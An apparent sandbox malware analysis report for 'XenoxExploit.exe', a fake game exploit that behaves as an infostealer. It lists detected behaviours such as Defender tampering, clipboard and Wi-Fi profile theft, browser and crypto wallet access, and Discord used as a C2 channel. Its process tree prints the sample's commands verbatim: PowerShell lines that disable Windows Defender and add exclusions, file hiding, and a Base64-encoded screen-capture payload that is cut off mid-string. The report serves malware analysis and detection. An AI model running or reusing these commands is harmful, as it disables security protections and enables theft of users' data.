Analysis
-
max time kernel
93s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-12-2024 16:50
Behavioral task
behavioral1
Sample
XenoxExploit.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
XenoxExploit.exe
Resource
win10v2004-20241007-en
General
-
Target
XenoxExploit.exe
-
Size
7.5MB
-
MD5
809744fdb0a46e19d8fdb5db88b95a31
-
SHA1
bc8d73f5aced88732c4d669e87026c7806bce2ca
-
SHA256
2fa3f17ecf4e81b96837aff155173a34c81f14e16d543237649eaa0885c01f27
-
SHA512
4a665b44b84cbf2b284d1670d1c54a04bbd7244fce715e4b54b350e9077a5dd974d455775bddfc2e3fbc9e930ba3755c0610e42f4f913d2642a0b324b74b7264
-
SSDEEP
196608:udQCwV+IurErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC1C:pVRurEUWjqeWx06rYYC
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 800 powershell.exe 1124 powershell.exe 5112 powershell.exe 4800 powershell.exe 2220 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts XenoxExploit.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 1200 cmd.exe 3708 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3420 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe 3704 XenoxExploit.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 discord.com 28 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com 25 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4068 tasklist.exe 3500 tasklist.exe 3336 tasklist.exe 5016 tasklist.exe 64 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 4792 cmd.exe -
resource yara_rule behavioral2/files/0x0007000000023c7f-21.dat upx behavioral2/memory/3704-25-0x00007FFCC7A80000-0x00007FFCC8144000-memory.dmp upx behavioral2/files/0x0007000000023c72-27.dat upx behavioral2/memory/3704-30-0x00007FFCDAB90000-0x00007FFCDABB5000-memory.dmp upx behavioral2/files/0x0007000000023c7d-29.dat upx behavioral2/files/0x0007000000023c7c-33.dat upx behavioral2/memory/3704-48-0x00007FFCE0530000-0x00007FFCE053F000-memory.dmp upx behavioral2/files/0x0007000000023c79-47.dat upx behavioral2/files/0x0007000000023c78-46.dat upx behavioral2/files/0x0007000000023c77-45.dat upx behavioral2/files/0x0007000000023c76-44.dat upx behavioral2/files/0x0007000000023c75-43.dat upx behavioral2/files/0x0007000000023c74-42.dat upx behavioral2/files/0x0007000000023c73-41.dat upx behavioral2/files/0x0007000000023c71-40.dat upx behavioral2/files/0x0007000000023c84-39.dat upx behavioral2/files/0x0007000000023c83-38.dat upx behavioral2/files/0x0007000000023c82-37.dat upx behavioral2/files/0x0007000000023c7e-34.dat upx behavioral2/memory/3704-54-0x00007FFCD7990000-0x00007FFCD79BD000-memory.dmp upx behavioral2/memory/3704-56-0x00007FFCDE920000-0x00007FFCDE93A000-memory.dmp upx behavioral2/memory/3704-58-0x00007FFCD7960000-0x00007FFCD7984000-memory.dmp upx behavioral2/memory/3704-60-0x00007FFCD6F20000-0x00007FFCD709F000-memory.dmp upx behavioral2/memory/3704-62-0x00007FFCDCBA0000-0x00007FFCDCBB9000-memory.dmp upx behavioral2/memory/3704-64-0x00007FFCE0380000-0x00007FFCE038D000-memory.dmp upx behavioral2/memory/3704-66-0x00007FFCD7920000-0x00007FFCD7953000-memory.dmp upx behavioral2/memory/3704-74-0x00007FFCDAB90000-0x00007FFCDABB5000-memory.dmp upx behavioral2/memory/3704-73-0x00007FFCC7550000-0x00007FFCC7A79000-memory.dmp upx behavioral2/memory/3704-71-0x00007FFCD7220000-0x00007FFCD72ED000-memory.dmp upx behavioral2/memory/3704-70-0x00007FFCC7A80000-0x00007FFCC8144000-memory.dmp upx behavioral2/memory/3704-76-0x00007FFCDAE00000-0x00007FFCDAE14000-memory.dmp upx behavioral2/memory/3704-79-0x00007FFCDA9F0000-0x00007FFCDA9FD000-memory.dmp upx behavioral2/memory/3704-78-0x00007FFCD7990000-0x00007FFCD79BD000-memory.dmp upx behavioral2/memory/3704-81-0x00007FFCDE920000-0x00007FFCDE93A000-memory.dmp upx behavioral2/memory/3704-82-0x00007FFCD6B30000-0x00007FFCD6C4B000-memory.dmp upx behavioral2/memory/3704-108-0x00007FFCD7960000-0x00007FFCD7984000-memory.dmp upx behavioral2/memory/3704-121-0x00007FFCD6F20000-0x00007FFCD709F000-memory.dmp upx behavioral2/memory/3704-216-0x00007FFCDCBA0000-0x00007FFCDCBB9000-memory.dmp upx behavioral2/memory/3704-299-0x00007FFCD7920000-0x00007FFCD7953000-memory.dmp upx behavioral2/memory/3704-303-0x00007FFCD7220000-0x00007FFCD72ED000-memory.dmp upx behavioral2/memory/3704-318-0x00007FFCC7550000-0x00007FFCC7A79000-memory.dmp upx behavioral2/memory/3704-344-0x00007FFCD6F20000-0x00007FFCD709F000-memory.dmp upx behavioral2/memory/3704-353-0x00007FFCDA9F0000-0x00007FFCDA9FD000-memory.dmp upx behavioral2/memory/3704-338-0x00007FFCC7A80000-0x00007FFCC8144000-memory.dmp upx behavioral2/memory/3704-339-0x00007FFCDAB90000-0x00007FFCDABB5000-memory.dmp upx behavioral2/memory/3704-369-0x00007FFCD6B30000-0x00007FFCD6C4B000-memory.dmp upx behavioral2/memory/3704-378-0x00007FFCE0380000-0x00007FFCE038D000-memory.dmp upx behavioral2/memory/3704-380-0x00007FFCD7220000-0x00007FFCD72ED000-memory.dmp upx behavioral2/memory/3704-379-0x00007FFCD7920000-0x00007FFCD7953000-memory.dmp upx behavioral2/memory/3704-377-0x00007FFCDCBA0000-0x00007FFCDCBB9000-memory.dmp upx behavioral2/memory/3704-376-0x00007FFCD6F20000-0x00007FFCD709F000-memory.dmp upx behavioral2/memory/3704-375-0x00007FFCD7960000-0x00007FFCD7984000-memory.dmp upx behavioral2/memory/3704-374-0x00007FFCDE920000-0x00007FFCDE93A000-memory.dmp upx behavioral2/memory/3704-373-0x00007FFCD7990000-0x00007FFCD79BD000-memory.dmp upx behavioral2/memory/3704-372-0x00007FFCE0530000-0x00007FFCE053F000-memory.dmp upx behavioral2/memory/3704-371-0x00007FFCDAB90000-0x00007FFCDABB5000-memory.dmp upx behavioral2/memory/3704-370-0x00007FFCC7550000-0x00007FFCC7A79000-memory.dmp upx behavioral2/memory/3704-368-0x00007FFCDA9F0000-0x00007FFCDA9FD000-memory.dmp upx behavioral2/memory/3704-367-0x00007FFCDAE00000-0x00007FFCDAE14000-memory.dmp upx behavioral2/memory/3704-355-0x00007FFCC7A80000-0x00007FFCC8144000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1176 cmd.exe 1080 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3560 cmd.exe 3036 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3080 WMIC.exe 1176 WMIC.exe 2824 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4524 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1080 PING.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 800 powershell.exe 5112 powershell.exe 5112 powershell.exe 800 powershell.exe 1124 powershell.exe 1124 powershell.exe 3708 powershell.exe 3708 powershell.exe 4584 powershell.exe 4584 powershell.exe 4584 powershell.exe 3708 powershell.exe 4800 powershell.exe 4800 powershell.exe 2212 powershell.exe 2212 powershell.exe 2220 powershell.exe 2220 powershell.exe 2248 powershell.exe 2248 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 64 tasklist.exe Token: SeIncreaseQuotaPrivilege 3524 WMIC.exe Token: SeSecurityPrivilege 3524 WMIC.exe Token: SeTakeOwnershipPrivilege 3524 WMIC.exe Token: SeLoadDriverPrivilege 3524 WMIC.exe Token: SeSystemProfilePrivilege 3524 WMIC.exe Token: SeSystemtimePrivilege 3524 WMIC.exe Token: SeProfSingleProcessPrivilege 3524 WMIC.exe Token: SeIncBasePriorityPrivilege 3524 WMIC.exe Token: SeCreatePagefilePrivilege 3524 WMIC.exe Token: SeBackupPrivilege 3524 WMIC.exe Token: SeRestorePrivilege 3524 WMIC.exe Token: SeShutdownPrivilege 3524 WMIC.exe Token: SeDebugPrivilege 3524 WMIC.exe Token: SeSystemEnvironmentPrivilege 3524 WMIC.exe Token: SeRemoteShutdownPrivilege 3524 WMIC.exe Token: SeUndockPrivilege 3524 WMIC.exe Token: SeManageVolumePrivilege 3524 WMIC.exe Token: 33 3524 WMIC.exe Token: 34 3524 WMIC.exe Token: 35 3524 WMIC.exe Token: 36 3524 WMIC.exe Token: SeDebugPrivilege 800 powershell.exe Token: SeDebugPrivilege 5112 powershell.exe Token: SeIncreaseQuotaPrivilege 3524 WMIC.exe Token: SeSecurityPrivilege 3524 WMIC.exe Token: SeTakeOwnershipPrivilege 3524 WMIC.exe Token: SeLoadDriverPrivilege 3524 WMIC.exe Token: SeSystemProfilePrivilege 3524 WMIC.exe Token: SeSystemtimePrivilege 3524 WMIC.exe Token: SeProfSingleProcessPrivilege 3524 WMIC.exe Token: SeIncBasePriorityPrivilege 3524 WMIC.exe Token: SeCreatePagefilePrivilege 3524 WMIC.exe Token: SeBackupPrivilege 3524 WMIC.exe Token: SeRestorePrivilege 3524 WMIC.exe Token: SeShutdownPrivilege 3524 WMIC.exe Token: SeDebugPrivilege 3524 WMIC.exe Token: SeSystemEnvironmentPrivilege 3524 WMIC.exe Token: SeRemoteShutdownPrivilege 3524 WMIC.exe Token: SeUndockPrivilege 3524 WMIC.exe Token: SeManageVolumePrivilege 3524 WMIC.exe Token: 33 3524 WMIC.exe Token: 34 3524 WMIC.exe Token: 35 3524 WMIC.exe Token: 36 3524 WMIC.exe Token: SeIncreaseQuotaPrivilege 1176 WMIC.exe Token: SeSecurityPrivilege 1176 WMIC.exe Token: SeTakeOwnershipPrivilege 1176 WMIC.exe Token: SeLoadDriverPrivilege 1176 WMIC.exe Token: SeSystemProfilePrivilege 1176 WMIC.exe Token: SeSystemtimePrivilege 1176 WMIC.exe Token: SeProfSingleProcessPrivilege 1176 WMIC.exe Token: SeIncBasePriorityPrivilege 1176 WMIC.exe Token: SeCreatePagefilePrivilege 1176 WMIC.exe Token: SeBackupPrivilege 1176 WMIC.exe Token: SeRestorePrivilege 1176 WMIC.exe Token: SeShutdownPrivilege 1176 WMIC.exe Token: SeDebugPrivilege 1176 WMIC.exe Token: SeSystemEnvironmentPrivilege 1176 WMIC.exe Token: SeRemoteShutdownPrivilege 1176 WMIC.exe Token: SeUndockPrivilege 1176 WMIC.exe Token: SeManageVolumePrivilege 1176 WMIC.exe Token: 33 1176 WMIC.exe Token: 34 1176 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1736 wrote to memory of 3704 1736 XenoxExploit.exe 84 PID 1736 wrote to memory of 3704 1736 XenoxExploit.exe 84 PID 3704 wrote to memory of 4092 3704 XenoxExploit.exe 85 PID 3704 wrote to memory of 4092 3704 XenoxExploit.exe 85 PID 3704 wrote to memory of 1924 3704 XenoxExploit.exe 86 PID 3704 wrote to memory of 1924 3704 XenoxExploit.exe 86 PID 3704 wrote to memory of 1492 3704 XenoxExploit.exe 87 PID 3704 wrote to memory of 1492 3704 XenoxExploit.exe 87 PID 3704 wrote to memory of 5056 3704 XenoxExploit.exe 91 PID 3704 wrote to memory of 5056 3704 XenoxExploit.exe 91 PID 3704 wrote to memory of 4076 3704 XenoxExploit.exe 93 PID 3704 wrote to memory of 4076 3704 XenoxExploit.exe 93 PID 4092 wrote to memory of 800 4092 cmd.exe 96 PID 4092 wrote to memory of 800 4092 cmd.exe 96 PID 1492 wrote to memory of 2396 1492 cmd.exe 95 PID 1492 wrote to memory of 2396 1492 cmd.exe 95 PID 5056 wrote to memory of 64 5056 cmd.exe 97 PID 5056 wrote to memory of 64 5056 cmd.exe 97 PID 1924 wrote to memory of 5112 1924 cmd.exe 98 PID 1924 wrote to memory of 5112 1924 cmd.exe 98 PID 4076 wrote to memory of 3524 4076 cmd.exe 99 PID 4076 wrote to memory of 3524 4076 cmd.exe 99 PID 3704 wrote to memory of 636 3704 XenoxExploit.exe 101 PID 3704 wrote to memory of 636 3704 XenoxExploit.exe 101 PID 636 wrote to memory of 3336 636 cmd.exe 103 PID 636 wrote to memory of 3336 636 cmd.exe 103 PID 3704 wrote to memory of 2168 3704 XenoxExploit.exe 104 PID 3704 wrote to memory of 2168 3704 XenoxExploit.exe 104 PID 2168 wrote to memory of 2224 2168 cmd.exe 106 PID 2168 wrote to memory of 2224 2168 cmd.exe 106 PID 3704 wrote to memory of 1972 3704 XenoxExploit.exe 107 PID 3704 wrote to memory of 1972 3704 XenoxExploit.exe 107 PID 1972 wrote to memory of 1176 1972 cmd.exe 109 PID 1972 wrote to memory of 1176 1972 cmd.exe 109 PID 3704 wrote to memory of 1564 3704 XenoxExploit.exe 110 PID 3704 wrote to memory of 1564 3704 XenoxExploit.exe 110 PID 1564 wrote to memory of 2824 1564 cmd.exe 112 PID 1564 wrote to memory of 2824 1564 cmd.exe 112 PID 3704 wrote to memory of 4792 3704 XenoxExploit.exe 113 PID 3704 wrote to memory of 4792 3704 XenoxExploit.exe 113 PID 3704 wrote to memory of 4296 3704 XenoxExploit.exe 114 PID 3704 wrote to memory of 4296 3704 XenoxExploit.exe 114 PID 4296 wrote to memory of 1124 4296 cmd.exe 117 PID 4296 wrote to memory of 1124 4296 cmd.exe 117 PID 4792 wrote to memory of 5096 4792 cmd.exe 118 PID 4792 wrote to memory of 5096 4792 cmd.exe 118 PID 3704 wrote to memory of 2628 3704 XenoxExploit.exe 120 PID 3704 wrote to memory of 2628 3704 XenoxExploit.exe 120 PID 3704 wrote to memory of 992 3704 XenoxExploit.exe 119 PID 3704 wrote to memory of 992 3704 XenoxExploit.exe 119 PID 992 wrote to memory of 4068 992 cmd.exe 123 PID 992 wrote to memory of 4068 992 cmd.exe 123 PID 2628 wrote to memory of 3500 2628 cmd.exe 124 PID 2628 wrote to memory of 3500 2628 cmd.exe 124 PID 3704 wrote to memory of 1420 3704 XenoxExploit.exe 125 PID 3704 wrote to memory of 1420 3704 XenoxExploit.exe 125 PID 3704 wrote to memory of 1200 3704 XenoxExploit.exe 127 PID 3704 wrote to memory of 1200 3704 XenoxExploit.exe 127 PID 3704 wrote to memory of 3684 3704 XenoxExploit.exe 129 PID 3704 wrote to memory of 3684 3704 XenoxExploit.exe 129 PID 3704 wrote to memory of 1192 3704 XenoxExploit.exe 130 PID 3704 wrote to memory of 1192 3704 XenoxExploit.exe 130 PID 3704 wrote to memory of 3560 3704 XenoxExploit.exe 131 PID 3704 wrote to memory of 3560 3704 XenoxExploit.exe 131 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 5096 attrib.exe 4424 attrib.exe 2944 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\XenoxExploit.exe"C:\Users\Admin\AppData\Local\Temp\XenoxExploit.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\XenoxExploit.exe"C:\Users\Admin\AppData\Local\Temp\XenoxExploit.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XenoxExploit.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XenoxExploit.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Debes tener bloxtrap para poder usar este exploit', 0, 'Information', 48+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Debes tener bloxtrap para poder usar este exploit', 0, 'Information', 48+16);close()"4⤵PID:2396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:64
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:3336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:2224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\XenoxExploit.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\XenoxExploit.exe"4⤵
- Views/modifies file attributes
PID:5096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:1420
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3684
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1192
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3560 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:4452
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:5008
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAg